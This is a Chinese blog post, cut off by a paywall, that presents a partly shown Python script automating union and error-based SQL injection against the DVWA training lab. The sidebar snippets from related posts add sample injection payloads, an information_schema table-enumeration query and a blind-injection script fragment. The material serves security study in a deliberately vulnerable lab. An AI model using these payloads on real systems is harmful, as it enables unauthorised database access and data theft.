基于dvwa的自动化sql注入脚本

最新推荐文章于 2022-07-30 13:12:01 发布
最新推荐文章于 2022-07-30 13:12:01 发布
阅读量557 收藏 7
点赞数
文章标签: mysql python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/altersueyunsheng/article/details/117291984
版权
该博客介绍了一个基于Python编写的自动化SQL注入脚本,适用于DVWA靶场中的SQL Injection低级别(Low)场景。脚本仅处理GET方式的注入,并利用联合注入和报错注入方法。通过HTTP头部信息构造SQL语句,解析数据库名、表名和字段,获取数据。报错注入部分使用了UPDATXML函数,通过捕获'XPATH syntax error'错误信息来判断注入成功。完整代码可在GitHub上查看。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入

概念等就不做介绍了,前人之述备矣。
本代码仅完成了get方式的注入,只针对了dvwa靶场中sql注入和盲注low部分的自动注入。(为了完成课程实验,因为dvwa里low级别注入方式是字符型的注入方式,因此我也减少了判断是数字注入还是字符注入,但要实现也容易,判断完类型后在构造sql语句中是否加“ ’ ”)
需要先构造http头部信息:

def get_header(url, cookie):  # 生成头部信息
    ip = re.search('\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}', url).group()
    headers = {
   
        'Host': f'{ip}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer': f'{url}',
        'Connection': 'close',
        'Cookie': f'security=low; PHPSESSID={cookie}',
        'Upgrade-Insecure-Requests': '1'
    }
    return headers, ip

下面是各部分代码:

联合注入

根据构造注入的sql语句,url和头部信息,获取到页面,当页面出现Unknown时表示注入错误,当注入正确时会返回页面信息。

def sql_union_inject(sql, url, headers):
    str = f'?id={sql}&Submit=Submit#'
    printf("正在猜解:" + url + str)
    recv = requests.get(url + str, headers=headers).text
最低0.47元/天 解锁文章
筱昀笙
关注
DVWA通过攻略之SQL注入
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1506
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
dvwa批量mysql注入脚本_【DVWASQL注入
weixin_33016287的博客
02-15 160
0x01 LowSQL Injection最简单的注入,没有任何过滤,常规语句注入即可:11'1'#1' union select 1,2 #0' union select database(),2 #0' union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa'...
DVWA SQL-injection 附python脚本
weixin_30617561的博客
01-05 360
SQL-Injection low等级 首先我们将dvwa等级调到low 如图 接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果 接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2 ...
DVWA下的SQL注入
07-25
SQL
DVWASQL注入
geejkse_seff的博客
07-30 440
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWASQL Injection(Blind)
谢公子的博客
08-05 2841
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
DVWA布尔类型注入脚本
Bu2n的博客
12-01 633
DVWA布尔类型注入脚本 import requests from lxml import etree """ 前提 pip install requests pip install lxml 如果是爆破dvwa的话,只需要网站登录一下dvwa,记录一下cookie,改一下url,referer 如果不是则需要修改的参数有payload,xpath,结果内容 该脚本只测试过low级别 """ url = 'http://192.168.159.132/dvwa/vulnerabilities/sqli
DVWA 命令注入
qq_41326328的博客
03-12 1258
DVWA 命令注入 实验 首先我们探讨一下 什么叫命令注入,指的是利用没有验证过的恶意命令或代码,对网站或者服务器进行渗透攻击。 注入有很多种,并不仅仅是SQL注入。比如: 命令注入(Command injection) Eval注入(Eval injection) 客户端脚本攻击(Script insertion) 跨网站脚本攻击(Cross Site Scripting,XSS) SQL注入...
dvwa为例学习简单sql布尔盲注的详细脚本
Lethe's Blog
03-02 2710
0x01 前置知识 1.SQL注入SQL盲注 SQL注入: 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 SQL盲注: 一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 一般在页面上不会直接显示sql执行的结果 ...
DVWAsql盲注...
weixin_45378289的博客
07-02 214
sql盲注没有返回数据库内容,所以要猜。 先猜长度,再猜字符 1’and length(database())>1 # 1’ and ascii(substr(database(),1,1))>1 # …好久好久 直接使用sqlmap来注入
基于DVWA靶场的盲注脚本
altersueyunsheng的博客
05-28 530
基于DVWA的自动盲注脚本 本文针对的是dvwa盲注部分的low级别的自动注入,关于概念等就不做介绍了。相比较有回显的注入,盲注这种注入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。 布尔盲注 dvwa盲注猜解正确会回显"User ID…",以此作为判断是否注入成功,headers为自己构造的头部信息。 def judge_sql_inject(sql, url, headers): # 返回判断,盲注 str = f'?id={sql}&am
web安全学习之基于dvwaSQL注入演练(low)
weixin_41657031的博客
07-15 484
SQL注入练习:基于DVWASQL注入演练(low) 1、设置 把安全等级先调整为low,让自己获得点信心。 2、测试和分析页面的功能 根据上面的提示,输入用户的id。然后我们输入之后,发现它返回了关于这个user的信息!这里我们输入了“1”。 它返回三行数据,一行是我们输入的用户ID。一行是用户名,另外一行是用户别名。同时,看一下浏览器的地址栏那里,发现url成这样了 这里有个id=1...
WEB手动漏洞挖掘-SQL盲注(DVWA实战)
含笑
05-20 6602
select * from table_name where id = ’ 1’ and 1=1– ’ 在盲注里至少要有一个正确的结果;否则不显示; 1'order by 5--+ 1'order by 3--+1'union select 1,2--+ 1'union select null,CONCAT_WS(CHAR(32,58.32),user(),database(),
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2929
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
【学习笔记】SQL盲注之dvwa平台的python自动化测试
Secur17y的博客
10-11 575
目的 理解SQL盲注的原理、方法、过程。利用不同数据库特有的函数进行探测,从而获取信息。 环境 系统:Kali Linux 2019(IP:10.10.10.128) 平台:OWASPBWA v0.94中的DVWA(IP:10.10.10.131) 界面 操作 现在想利用substr函数对数据库名进行猜解,将字符转化为ACSII值逐位比较。 语法 substr(strings,offset,le...
sql注入脚本1
m0_55772907的博客
05-01 1033
sqllab第一关验证poc import requests import re url = input("输入你的url:") r = requests.get(url) res = str(r.content) if re.search("syntax",res): print("存在sql注入") else: print("不存在")
SQL注入获取数据库V1—自动化脚本
weixin_48968378的博客
12-14 1494
1、搭建好python环境,新建一个文件夹将代码复制进文件夹中命名以“.py”结尾,同时新建一个文件cmd.bat文件,文件内容是:cmd.exe 2、双击cmd.bat文件,进入cmd命令界面 3、输入命令 :python sqlbind_v1.py 回车执行 回车执行得数据库名: 获取表名: 字段名: 到此处我们就可以退出了,不用查看字段内容 下面是代码,在执行前一定先去修改payload和标志位,在执行的过程中如果较慢,可以将代码中的httpx请求换成req...
dvwa靶场SQL注入
最新发布
03-30
除了依赖像 sqlmap 这样的自动化工具外,还可以自己动手编写注入脚本或直接在浏览器栏里修改 GET 请求参数来进行实验。例如,在最低难度模式下的 DVWA SQL Injection 页面上,可以通过向 id 参数附加布尔条件表达式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值